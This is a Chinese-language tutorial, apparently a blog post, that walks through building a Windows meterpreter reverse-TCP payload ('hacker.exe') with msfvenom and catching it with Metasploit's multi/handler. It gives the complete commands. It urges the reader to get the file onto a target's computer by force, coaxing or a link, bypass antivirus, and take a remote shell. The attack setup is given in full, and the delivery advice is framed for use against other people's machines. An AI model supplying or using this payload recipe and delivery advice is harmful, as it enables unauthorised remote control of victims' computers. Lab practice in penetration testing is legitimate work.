这是一个简单的metasploit使用实例:
首先,我们要先准备一些东西:
1.kali 虚拟机
2.kali IP地址:192.168.222.128 (可使用ifconfig查询)
3.一个kali没有使用的端口:5555
4.一个可以与kali通信的靶机:windows 10 (ip未知)
首先,我们得准备一下我们的鱼饵:hacker.exe
我们先在kali里精心制作一下鱼饵!:
#:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.222.128 LPORT=5555 -f exe -o /hacker.exe
这个是什么意思呢?就是执行命令,就会在根目录生成一个hacker.exe 这个exe可以向IP为192.168.222.128的主机端口5555发送一些东西,就相当于是一个间谍,间谍只需要把必要的东西(handler)句柄发过去,就 成功了。
这个文件是鱼饵了!!!
但是有了鱼饵还不够,对吧,我们要找个东西给他接住,间谍拿到东西,我们得找人给他接头!于是,我们就去kali上服务台给他配个接头人!
特务怎么做呢!
msfconsole #进入msf
use exploit/multi/handler #使用该模块
set payload windows/meterpreter/reverse_tcp #使用该payload
set LHOST 192.168.222.128 #设置接头人IP
set LPORT 5555 #设置接头人端口
exploit #接头人开始工作
看到这,你的接头老特务就开始工作了!
他就一直在老地方接头!!!
然后,你通过你自己的方式,对吧,强迫也好,软磨硬泡也好,把鱼饵给目标计算机,让他执行!!!这里有个前提,目标计算机必须和kali能够通信好吧!你TM都不能通信,物理上都不能连接,就别白扯了好吧!这里演示的是内网通信,公网通信稍稍复杂,咱就不说了!同志们可以去百度查找资料,学习!
然后呢,间谍执行!!===windows 执行hacker.exe
windows 咋有hacker.exe
呵!年轻!当然是拷过去的!不然你以为呢!可以弄一下什么链接呀,对吧,随便你了,反正!!!主要是要执行
执行结果!!
玩个!!!球!!拿错了!强制执行!!!信任好吧!!
不要杀!!
哈哈哈
强行中毒好吧,强行中毒!
执行后:
kali 反弹了一个shell
可以执行ls,help,等命令查看目标
然后,mkdir dager 测试一下,做个文件夹
成功!!!
今天就到这!!!再见!!!
白嫖兄们,爱你呦!!!